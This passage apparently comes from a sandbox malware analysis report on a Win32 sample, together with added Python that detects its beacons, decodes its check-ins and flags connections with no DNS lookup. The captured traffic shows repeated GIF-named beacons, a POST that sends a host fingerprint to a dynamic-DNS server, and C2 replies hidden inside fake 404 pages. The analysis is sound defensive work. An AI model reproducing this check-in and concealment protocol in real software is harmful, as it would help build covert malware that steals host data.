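The requests listed above are shown only as raw strings. The Python below is an added example, not code from the Joe Sandbox report or from the sample itself: it reconstructs four of the listed requests (CRLF line endings restored, bodies copied verbatim from the "Data Ascii" fields), splits each into request line, ordered headers and body, classifies the sobaka*.gif GETs by path shape and header order, and peels the layers of the tasks.php POST body (form field, base64, '&'-separated URL-encoded fields, one of which is base64 again). Two things are assumptions of the example and not stated on this page: the field names given to the decoded check-in are inferred from the values, and matching on exactly the header order User-Agent, Host, Cache-Control is a reading of the alert name "Common Downloader Header Pattern UHCa", not the ET Pro rule text.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed test input reconstructed from the requests in the report above
# (CRLF line endings restored); this is not a packet capture.
SAMPLE_REQUESTS = [
    "GET /sobaka1.gif?72f523=7533859 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)\r\n"
    "Host: padrup.com\r\nCache-Control: no-cache\r\n\r\n",
    "GET /sobakavolos.gif?121e2607=-1559275969 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)\r\n"
    "Host: 190.120.227.91:8080\r\nCache-Control: no-cache\r\n\r\n",
    "POST /n/tasks.php HTTP/1.0\r\nHost: n.ddnsgratis.com.br\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b\r\nContent-length: 12\r\n\r\n"
    "_wv=ZW50ZXI=\n",
    "POST /n/tasks.php HTTP/1.0\r\nHost: n.ddnsgratis.com.br\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b\r\nContent-length: 192\r\n\r\n"
    "_wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=\n",
]

# Path shape of the GET beacon: /sobaka<suffix>.gif?<hex>=<signed decimal>
BEACON_RE = re.compile(r"^/sobaka\w*\.gif\?[0-9a-f]+=-?\d+$")

# Assumed header order behind the "UHCa" alert name (User-Agent, Host, Cache-Control).
BEACON_HEADER_ORDER = ["user-agent", "host", "cache-control"]

# Labels for the decoded check-in fields; inferred from the values, not documented.
CHECKIN_FIELD_LABELS = ["command", "bot_id", "identity_b64", "os", "flag",
                        "antivirus", "version", "date", "extra"]


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.x request into request line, ordered headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []  # list, not dict: header order is the fingerprint here
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def classify(req: dict) -> str:
    """Label a parsed request with the traffic family it matches in this report."""
    names = [n.lower() for n, _ in req["headers"]]
    if (req["method"] == "GET" and BEACON_RE.match(req["target"])
            and names == BEACON_HEADER_ORDER):
        return "sobaka_gif_beacon"
    if (req["method"] == "POST" and urlsplit(req["target"]).path.endswith("/tasks.php")
            and req["body"].startswith("_wv=")):
        return "tasks_php_checkin"
    return "other"


def decode_checkin(body: str) -> dict:
    """Unwrap the tasks.php body: form field -> base64 -> '&'-joined URL-encoded fields.
    partition() is used instead of parse_qsl() on purpose: the value is base64, and
    form decoding would turn any '+' in it into a space."""
    name, _, value = body.strip().partition("=")
    if name != "_wv":
        raise ValueError("unexpected form field %r" % name)
    inner = base64.b64decode(value, validate=True).decode("ascii")
    fields = [unquote(f) for f in inner.split("&")]
    out = {"fields": fields}
    if fields[0] == "cmd" and len(fields) == len(CHECKIN_FIELD_LABELS):
        out["labelled"] = dict(zip(CHECKIN_FIELD_LABELS, fields))
        # The third field is base64 once more and carries "user : host : number".
        out["identity"] = base64.b64decode(fields[2], validate=True).decode("ascii")
    return out


def summarize(raws=SAMPLE_REQUESTS) -> list:
    """Parse, classify and (for check-ins) decode every request; returns one dict each."""
    rows = []
    for raw in raws:
        req = parse_request(raw)
        row = {"kind": classify(req), "target": req["target"]}
        if row["kind"] == "tasks_php_checkin":
            row["checkin"] = decode_checkin(req["body"])
        rows.append(row)
    return rows


if __name__ == "__main__":
    for row in summarize():
        print(row["kind"], row["target"], row.get("checkin", {}).get("fields", ""))
```

Decoded, the 192-byte POST body reads cmd, a GUID, a base64 string that unwraps to the sandbox's user and host name, the OS string "Windows 10 (64-bit)", "1", "Windows Defender", "5.1", "18.10.2024" and "NONE": a host fingerprint sent in the clear, which is what to look for when scoping which machines checked in to n.ddnsgratis.com.br. The shorter body decodes to just "enter".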
Source: unknown; TCP traffic detected without corresponding DNS query: 190.120.227.91 (50 identical entries)
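The signature above flags connections to an address that no DNS answer in the session ever named, which is how a hard-coded C2 address shows up next to domain-based traffic. The Python below is an added example, not part of the Joe Sandbox report, of that correlation over a constructed event stream modelled on this analysis: padrup.com is resolved and then contacted on port 80, while 190.120.227.91:8080 is contacted with no lookup at all. The timestamps, the padrup.com -> 185.53.178.50 answer and the 192.168.2.1 resolver address are assumptions made for the example.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One network event: a DNS answer ("dns") or a TCP connection attempt ("conn")."""
    ts: float
    kind: str
    name: str = ""   # dns: queried name
    ip: str = ""     # dns: answered address; conn: destination address
    port: int = 0    # conn: destination port


# Constructed sample stream (not captured data); see the lead-in for what is assumed.
SAMPLE_EVENTS = [
    Event(0.00, "conn", ip="192.168.2.1", port=53),
    Event(0.01, "dns", name="padrup.com", ip="185.53.178.50"),
    Event(0.10, "conn", ip="185.53.178.50", port=80),
    Event(0.20, "conn", ip="190.120.227.91", port=8080),
    Event(0.35, "conn", ip="190.120.227.91", port=8080),
    Event(0.40, "conn", ip="185.53.178.50", port=80),
    Event(0.50, "conn", ip="190.120.227.91", port=8080),
]


def connections_without_dns(events) -> dict:
    """Return {(ip, port): count} for destinations contacted before any DNS answer
    named them. Private and loopback addresses are skipped: the sandbox reaches its
    gateway and resolver by address legitimately, and they would otherwise be flagged."""
    resolved = set()
    hits = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "dns":
            resolved.add(ev.ip)
            continue
        addr = ipaddress.ip_address(ev.ip)
        if addr.is_private or addr.is_loopback:
            continue
        if ev.ip not in resolved:
            key = (ev.ip, ev.port)
            hits[key] = hits.get(key, 0) + 1
    return hits


if __name__ == "__main__":
    for (ip, port), n in connections_without_dns(SAMPLE_EVENTS).items():
        print("no DNS answer for %s:%d (%d connections)" % (ip, port, n))
```

Ordering matters: a DNS answer that arrives after the first connection does not excuse it, which is why the events are processed in time order rather than by first collecting every answer. On real Zeek or Suricata logs the same logic runs over dns.log answers and conn.log originator connections, with the same private-address exclusion.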
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Code function: 1_2_01440945 lstrcpy, InternetOpenA, InternetOpenUrlA, CreateFileA, InternetReadFile, WriteFile, CloseHandle, InternetCloseHandle, InternetCloseHandle; 1_2_01440945
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?47aa66b=526028013 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4991659=617132744 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?50e8edc=169680312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?542972c=882501560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?5b7e0de=767493872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?10d62ae4=564942280 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?115dbf54=-1381402296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1176f212=293007890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?11fef99e=-1275740116 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?121e2607=-1559275969 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?12ba214d=-2095650533 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?12d42dc2=947685702 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?13de3bbe=-1294984786 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?140deb53=-1939771579 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1495f698=690744624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?14b59e3b=1737234215 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1543ef95=713547562 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?15aba7b5=-659256046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?16b31880=-867443584 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?16d8692d=1149844359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1781559f=-1928855110 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?17a69eba=-1120602672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?18285ae2=405297890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1847fe9d=-1443367349 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?18b777d9=-977551672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?18d65779=-1378065329 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?195904b8=425264312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?19856214=856343592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1a078ca7=-1238050671 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?253429ca=1872526686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?25bc9cf1=633117937 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?25d5c2b0=-486371296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?269bb762=239207342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?270a0145=-2040263502 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?27c85804=-957761516 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?27fe3552=-1611082424 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?28892810=465574000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?28a2e80b=-204378046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2924596e=690248046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2945db31=1244584328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?29d43e7c=701775484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?29f3e9f8=-1479563296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2a6f2852=688527934 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2a895223=713642531 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2b0ab4f0=-684357456 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2b436842=725837890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2bc60f28=-2091766408 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2be56550=-1225394912 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2e00e35c=-1979536876 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2e54b34b=777302859 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2ff37fd5=-1349550467 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?308e5400=-443594752 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?311dbd80=1473261184 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?31430591=-1815539533 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?31c7acfb=1551219421 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?31e7f67c=-1054365092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3269d32c=845796140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?328f1419=848237593 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?331ed01f=-1728675592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3337cce9=1720097375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?33c00681=914368262 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: padrup.com
        Source: global trafficDNS traffic detected: DNS query: ns.dotbit.me
        Source: global trafficDNS traffic detected: DNS query: alors.deepdns.cryptostorm.net
        Source: global trafficDNS traffic detected: DNS query: onyx.deepdns.cryptostorm.net
        Source: global trafficDNS traffic detected: DNS query: ns1.any.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: ns1.random.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: n.ddnsgratis.com.br
        Source: global trafficDNS traffic detected: DNS query: ns2.random.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: anyone.dnsrec.meo.ws
        Source: global trafficDNS traffic detected: DNS query: ist.fellig.org
        Source: global trafficDNS traffic detected: DNS query: civet.ziphaze.com
        Source: global trafficDNS traffic detected: DNS query: ns2.fr.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: ns1.sg.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: ns1.nl.dns.d0wn.biz
        Source: unknownHTTP traffic detected: POST /n/tasks.php HTTP/1.0Host: n.ddnsgratis.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: 12Data Raw: 5f 77 76 3d 5a 57 35 30 5a 58 49 3d 0a Data Ascii: _wv=ZW50ZXI=
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:42:26 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 357Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 63 33 56 6a 59 32 56 7a 63 77 3d 3d 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---c3VjY2Vzcw==--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:43:13 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:43:59 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this 